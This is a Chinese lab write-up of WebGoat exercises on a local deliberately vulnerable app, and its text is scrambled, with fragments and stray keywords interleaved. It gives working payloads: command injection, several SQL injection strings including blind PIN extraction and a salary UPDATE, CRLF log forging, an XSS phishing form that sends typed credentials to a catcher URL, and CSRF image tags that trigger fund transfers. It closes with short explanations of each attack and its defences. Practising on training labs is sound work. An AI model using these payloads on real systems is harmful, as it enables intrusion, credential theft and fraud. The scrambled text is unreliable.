localhost:8080/WebGoat
打开webgoat,左侧选择题目Inspect Element
开始调试"& netstat -an & ipconfig"
View
查看结果SELECT * FROM weather_data WHERE station = 101 OR 1=1
,并在station的value
处作相应修改在username
一栏输入:5224【学号】%0d%0aLogin Succeeded for username: admin
web
查看结果正则表达式
更改密码栏maxlength为100.sql
选择用户Neville (admin)
登录,在密码栏输入' or 1=1 --
数据库
101; update employee set salary=5224
进行攻击,这里没有作太多操做101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 2000 );
的语句缩小范围,最终肯定pin值</form> <script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value); } </script> <form name="phish"> <br> <br> <HR> <H2>This feature requires account login:</H2> <br> <br>Enter Username:<br> <input type="text" name="user"> <br>Enter Password:<br> <input type="password" name = "pass"> <br> <input type="submit" name="login" value="login" onclick="hack()"> </form> <br> <br> <HR>
<script>alert('I am 5224')</script>
【或其余警告】<img src="http://localhost:8080/WebGoat/attack?Screen=288&menu=900&transferFunds=500" width="1" height="1">
【注意Screen
和menu
的值应为本身页面右侧窗口出的数值】浏览器
<img src="attack?Screen=226&menu=900&transferFunds=5000" width="1" height="1"> <img src="attack?Screen=226&menu=900&transferFunds=confirm" width="1" height="1">
攻击原理:SQL注入便是指web应用程序对用户输入数据的合法性没有判断,攻击者能够在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现欺骗数据库服务器执行非受权的任意查询,从而进一步获得相应的数据信息。服务器
SQL注入通常流程是:cookie
寻找到SQL注入的位置session
判断服务器类型和后台数据库类型xss
针对不通的服务器和数据库特色进行SQL注入攻击jsp
攻击原理:XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,因此容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie、破坏页面结构、重定向到其它网站等。
防护措施:HttpOnly防止劫取Cookie;输入检查通常是检查用户输入的数据中是否包含一些特殊字符,如<、>、'、"等,若是发现存在特殊字符,则将这些字符过滤或者编码等。
攻击原理:CSRF攻击的主要目的是让用户在不知情的状况下攻击本身已登陆的一个系统,相似于钓鱼。如用户当前已经登陆了邮箱,或bbs,同时用户又在使用另一个,已经被你控制的站点,咱们姑且叫它钓鱼网站。这个网站上面可能由于某个图片吸引你,你去点击一下,此时可能就会触发一个js的点击事件,构造一个bbs发帖的请求,去往你的bbs发帖,因为当前你的浏览器状态已是登录状态,因此session登录cookie信息都会跟正常的请求同样,纯自然的利用当前的登录状态,让用户在不知情的状况下,帮你发帖或干其余事情。
防护措施:验证HTTP Referer字段,在请求地址中添加token并验证,在HTTP头中自定义属性并验证等。
有意思是真的有意思,个人kali全屏以后整个高斯模糊、我也是真的服气